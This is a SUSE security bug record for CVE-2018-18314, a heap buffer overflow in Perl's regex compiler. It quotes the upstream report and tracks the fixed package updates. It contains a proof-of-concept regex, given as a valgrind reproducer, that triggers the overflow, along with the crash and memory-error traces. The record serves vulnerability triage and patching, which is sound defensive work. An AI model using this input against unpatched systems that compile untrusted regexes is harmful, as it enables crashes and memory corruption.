Bug 1114686 (CVE-2018-18314)

Summary: VUL-1: CVE-2018-18314: perl: Heap-based buffer overflow in regex
Product: [Novell Products] SUSE Security Incidents
Reporter: Marcus Meissner <meissner>
Component: Incidents
Assignee: Michael Schröder <mls>
Status: RESOLVED FIXED
QA Contact: Security Team bot <security-team>
Severity: Minor
Priority: P4 - Low
CC: smash_bz
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/218667/
Whiteboard: CVSSv3:SUSE:CVE-2018-18314:4.5:(AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L) CVSSv3:RedHat:CVE-2018-18314:7.0:(AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H) CVSSv2:NVD:CVE-2018-18314:7.5:(AV:N/AC:L/Au:N/C:P/I:P/A:P) CVSSv3:NVD:CVE-2018-18314:9.8:(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Comment 3 Marcus Meissner 2018-11-05 12:43:13 UTC
QA REPRODUCER:

valgrind perl -e 'm/(?[(?s:(?[[x]][xx]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx])/;'
Comment 4 Marcus Meissner 2018-11-05 13:29:42 UTC
CRD: 2018-11-22
Comment 5 Marcus Meissner 2018-11-09 07:10:17 UTC
CRD: 2018-11-29
Comment 6 Michael Schröder 2018-11-21 15:14:03 UTC
I don't think perl-5.18 is affected.
Comment 8 Marcus Meissner 2018-11-30 09:52:49 UTC
https://rt.perl.org/Public/Bug/Display.html?id=131649

Bug #131649 for perl5: [CVE-2018-18314] Heap-based buffer overflow in S_regatom

Jakub Wilk <jwilk@jwilk.net> - Request created
From: Jakub Wilk <jwilk [...] jwilk.net>
Date: Sun, 25 Jun 2017 00:25:07 +0200
To: perl5-security-report [...] perl.org
Subject: Heap-based buffer overflow in S_regatom
Consider the following Perl program:

m/(?[(?s:(?[[x]][xx]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx])/;
__END__

This is what happens when I run it:

  The regex_sets feature is experimental in regex; marked by <-- HERE in m/(?[ <-- HERE (?s:(?[[x]][xx]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx])/ at test line 1.
  The regex_sets feature is experimental in regex; marked by <-- HERE in m/(?[(?s:(?[ <-- HERE [x]][xx]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx])/ at test line 1.
  panic: reg_node overrun trying to emit 0, 8677794>=8677790 at test line 1.

Valgrind says it's a heap-based buffer overflow:

  Invalid write of size 1
     at 0x80EE11B: S_regatom (regcomp.c:13490)
     by 0x80E6A9D: S_regpiece (regcomp.c:11669)
     by 0x80E6872: S_regbranch (regcomp.c:11594)
     by 0x80E58D4: S_reg (regcomp.c:11332)
     by 0x80D85AF: Perl_re_op_compile (regcomp.c:7309)
     by 0x806D7DF: Perl_pmruntime (op.c:5882)
     by 0x80C2417: Perl_yyparse (perly.y:1204)
     by 0x8086637: S_parse_body (perl.c:2377)
     by 0x808578B: perl_parse (perl.c:1692)
     by 0x8061751: main (perlmain.c:121)
   Address 0x428e698 is 0 bytes after a block of size 160 alloc'd
     at 0x402A1CC: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
     by 0x81082BC: Perl_safesysmalloc (util.c:153)
     by 0x80D7E43: Perl_re_op_compile (regcomp.c:7155)
     by 0x806D7DF: Perl_pmruntime (op.c:5882)
     by 0x80C2417: Perl_yyparse (perly.y:1204)
     by 0x8086637: S_parse_body (perl.c:2377)
     by 0x808578B: perl_parse (perl.c:1692)
     by 0x8061751: main (perlmain.c:121)

$ perl -V
Summary of my perl5 (revision 5 version 26 subversion 0) configuration:
  Commit id: 95388f2eb27e74cdbfb715c0097f16aeba4e6e4e
  Platform:
    osname=linux
    osvers=3.16.0-4-686-pae
    archname=i686-linux
    uname='linux dirac 3.16.0-4-686-pae #1 smp debian 3.16.43-2 (2017-04-30) i686 gnulinux '
    config_args='-Dcc=gcc -d'
    hint=previous
    useposix=true
    d_sigaction=define
    useithreads=undef
    usemultiplicity=undef
    use64bitint=undef
    use64bitall=undef
    uselongdouble=undef
    usemymalloc=n
    default_inc_excludes_dot=define
    bincompat5005=undef
  Compiler:
    cc='gcc'
    ccflags ='-fwrapv -fno-strict-aliasing -pipe -fstack-protector-strong -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -D_FORTIFY_SOURCE=2'
    optimize='-g'
    cppflags='-fwrapv -fno-strict-aliasing -pipe -fstack-protector-strong -I/usr/local/include'
    ccversion=''
    gccversion='4.9.2'
    gccosandvers=''
    intsize=4
    longsize=4
    ptrsize=4
    doublesize=8
    byteorder=1234
    doublekind=3
    d_longlong=define
    longlongsize=8
    d_longdbl=define
    longdblsize=12
    longdblkind=3
    ivtype='long'
    ivsize=4
    nvtype='double'
    nvsize=8
    Off_t='off_t'
    lseeksize=8
    alignbytes=4
    prototype=define
  Linker and Libraries:
    ld='cc'
    ldflags =' -fstack-protector-strong -L/usr/local/lib'
    libpth=/usr/local/lib /usr/lib/gcc/i586-linux-gnu/4.9/include-fixed /usr/include/i386-linux-gnu /usr/lib /lib/i386-linux-gnu /lib/../lib /usr/lib/i386-linux-gnu /usr/lib/../lib /lib /usr/local/lib /usr/lib/gcc/i586-linux-gnu/4.9/include-fixed /usr/include/i386-linux-gnu /usr/lib /usr/local/lib /usr/lib/gcc/i586-linux-gnu/4.9/include-fixed /usr/include/i386-linux-gnu /usr/lib /usr/local/lib /usr/lib/gcc/i586-linux-gnu/4.9/include-fixed /usr/include/i386-linux-gnu /usr/lib /usr/local/lib /usr/lib/gcc/i586-linux-gnu/4.9/include-fixed /usr/include/i386-linux-gnu /usr/lib
    libs=-lpthread -lnsl -ldl -lm -lcrypt -lutil -lc
    perllibs=-lpthread -lnsl -ldl -lm -lcrypt -lutil -lc
    libc=libc-2.19.so
    so=so
    useshrplib=false
    libperl=libperl.a
    gnulibc_version='2.19'
  Dynamic Linking:
    dlsrc=dl_dlopen.xs
    dlext=so
    d_dlsymun=undef
    ccdlflags='-Wl,-E'
    cccdlflags='-fPIC'
    lddlflags='-shared -O2 -L/usr/local/lib -fstack-protector-strong'


Characteristics of this binary (from libperl):
  Compile-time options:
    HAS_TIMES
    PERLIO_LAYERS
    PERL_COPY_ON_WRITE
    PERL_DONT_CREATE_GVSV
    PERL_HASH_FUNC_ONE_AT_A_TIME_HARD
    PERL_MALLOC_WRAP
    PERL_OP_PARENT
    PERL_PRESERVE_IVUV
    USE_LARGE_FILES
    USE_LOCALE
    USE_LOCALE_COLLATE
    USE_LOCALE_CTYPE
    USE_LOCALE_NUMERIC
    USE_LOCALE_TIME
    USE_PERLIO
    USE_PERL_ATOF
  Built under linux
  Compiled at Jun 21 2017 19:00:20
  @INC:
    /usr/local/lib/perl5/site_perl/5.26.0/i686-linux
    /usr/local/lib/perl5/site_perl/5.26.0
    /usr/local/lib/perl5/5.26.0/i686-linux
    /usr/local/lib/perl5/5.26.0

-- 
Jakub Wilk
Comment 9 Swamp Workflow Management 2018-12-19 14:15:33 UTC
SUSE-SU-2018:4187-1: An update that fixes four vulnerabilities is now available.

Category: security (moderate)
Bug References: 1114674,1114675,1114681,1114686
CVE References: CVE-2018-18311,CVE-2018-18312,CVE-2018-18313,CVE-2018-18314
Sources used:
SUSE Linux Enterprise Module for Development Tools 15 (src):    perl-5.26.1-7.6.1
SUSE Linux Enterprise Module for Basesystem 15 (src):    perl-5.26.1-7.6.1
Comment 10 Swamp Workflow Management 2018-12-22 23:12:08 UTC
openSUSE-SU-2018:4258-1: An update that fixes four vulnerabilities is now available.

Category: security (moderate)
Bug References: 1114674,1114675,1114681,1114686
CVE References: CVE-2018-18311,CVE-2018-18312,CVE-2018-18313,CVE-2018-18314
Sources used:
openSUSE Leap 15.0 (src):    perl-5.26.1-lp150.6.6.1
Comment 11 Marcus Meissner 2023-03-22 13:07:31 UTC
done